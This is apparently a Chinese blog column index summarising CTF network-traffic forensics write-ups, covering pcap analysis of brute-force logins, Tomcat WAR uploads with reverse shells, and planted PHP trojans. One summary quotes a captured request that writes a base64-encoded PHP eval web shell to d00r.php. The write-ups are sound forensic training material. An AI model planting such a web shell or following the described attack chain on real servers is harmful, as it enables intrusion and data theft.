流量分析题目
文章平均质量分 80
流量分析
比風更自由
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
2023第二届陇剑杯网络安全大赛一HD部分
查看第一个流量包,有AES加密密钥是:l36DoqKUYQP0N7e1加密模式是:CBC填充方式:Pkcs7加下来找登陆成功的密文。57成功了,看第五十六个。解这个:KGM7NI0/WvKswK+PlmFIhO4gqe8jJzRdOi02GQ0wZoo=记得把from base64选上。原创 2025-12-05 15:19:19 · 341 阅读 · 0 评论 -
2023第二届陇剑杯网络安全大赛——EW&TP部分
后门文件肯定是上传上去的,用POST请求,所以过滤这里有两个敏感的文件ViewMore.php和d00r.php这里有一串a=file_put_contents%28%27d00r.php%27%2C+base64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%3D%3D%27%29%29%3Burl解码后是所以d00r.php是上传的,而ViewMore.php是服务器自带的,所以答案就是ViewMore.php。原创 2025-12-04 21:08:12 · 740 阅读 · 0 评论 -
2023第二届陇剑杯网络安全大赛——WS&SSW部分
统计里就 192.168.246.1和192.168.246.28活跃,整个流量包内容过少。所以我们直接顺着看就行了。第一行是192.168.246.1问内网谁有Dropbox,用来传文件的。第2-4行是广播,询问84.17.53.155,50.7.252.138,104.194.8.134的mac地址5-7行进行了握手,192.168.246.1向192.168.246.28发送了SYN请求192.168.246.28返回了SYN+ACK192.168.246.1回复了ACK。原创 2025-12-03 23:20:28 · 674 阅读 · 0 评论 -
2023第二届陇剑杯网络安全大赛——SS&HW部分
直接过滤tcp.flags.syn==1&&tcp.flags.ack==1这是代表TCP连接真正建立了。原创 2025-12-02 21:37:46 · 546 阅读 · 0 评论 -
流量分析-attack.pcapng
A 集团的⽹络安全监控系统发现恶意份⼦正在实施⾼级可持续攻击(APT),并抓取了部分可疑流 量包。请您根据捕捉到的流量包,搜寻出⽹络攻击线索,分解出隐藏的恶意程序,并分析恶意程序 的⾏为。原创 2025-12-01 20:40:38 · 133 阅读 · 0 评论 -
24年湖南流量分析web.pcap
摘要:通过分析web.pcap数据包,发现攻击源IP为10.0.0.120。攻击者利用8080端口访问Tomcat管理面板,使用Gobuster工具枚举目录后,通过暴力破解获取了管理员凭据。成功登录后上传了恶意文件JXQOZY.war,利用自动解压特性实施反向shell攻击。整个攻击过程展示了从端口扫描、目录爆破到最终植入后门的完整APT攻击链。原创 2025-11-29 20:49:06 · 278 阅读 · 0 评论 -
中职网络安全2021年国赛Wireshark流量分析
通过分析网络流量发现黑客IP(172.16.1.110)对目标服务器(172.16.1.18)进行多端口暴力破解,主要针对FTP(21)、SSH(22)、Telnet(23)和MySQL(3306)端口。其中MySQL服务版本为5.7.26,黑客成功植入名为"horse"的PHP木马(连接密码lqsym),并通过木马查看了/etc/passwd文件。在Telnet交互中还发现服务器主机名为SecTestLabs,且从FTP流量中提取出一张包含英文单词的图片。原创 2025-11-28 22:27:06 · 991 阅读 · 0 评论 -
22年安恒8月流量分析
一共要用到六个文件。原创 2025-11-26 23:39:56 · 834 阅读 · 1 评论
分享